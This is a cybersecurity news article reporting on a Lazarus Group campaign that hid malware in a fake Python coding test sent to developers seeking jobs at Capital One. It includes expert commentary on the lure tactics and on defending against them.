New malicious software packages tied to the North Korean Lazarus Group were observed posing as a Python coding skills test for developers seeking a new job at Capital One, but were tracked to GitHub projects with embedded malware.
Researchers at ReversingLabs explained in a Sept. 10 blog post that the scheme was a follow-on to the VMConnect campaign that they first identified in August 2023 in which developers were lured into downloading malicious code via fake job interviews.
For this most recent campaign, the instructions sent by the threat actor set a timeframe for completing an assignment, which was to find a code flaw in the package and fix it. The researchers said the lure was clearly intended to create a sense of urgency for the job-seeker, making it more likely that they would download the malicious package.
Eric Schwake, director of cybersecurity strategy at Salt Security, said this attack takes advantage of developers' natural desire to demonstrate their skills. It uses the legitimate process of code reviews and assessments, making it difficult to detect.
“Downloading and running code is a fundamental part of a developer's workflow, making it harder to identify malicious activity among regular operations,” said Schwake. “Developers often have privileged access to source code, sensitive data, and production environments, so compromising a developer can lead to severe downstream consequences.”
Ngoc Bui, cybersecurity expert at Menlo Security, added that this infection chain aligns closely with North Korea’s typical tactics, techniques and procedures.
If security teams believe Lazarus poses a threat to their organization, Bui said adding a dedicated threat intelligence team to actively monitor their activity can give them a strategic advantage. While it may not prevent every attack, Bui said continuous tracking enables earlier detection and increases the team’s chances of mitigating threats before they cause significant damage.
“Some previous attacks include the VMConnect campaign from 2023, linked to the Lazarus Group, where malicious PyPI packages were used to mimic legitimate tools,” said Bui. “Techniques such as using LinkedIn accounts posing as recruiters and malware delivery via CHM files were also previously observed. Overlapping TTPs also include the use of malicious Python packages, encoded downloader functions, and fake job interviews to lure developers into executing the malware.”
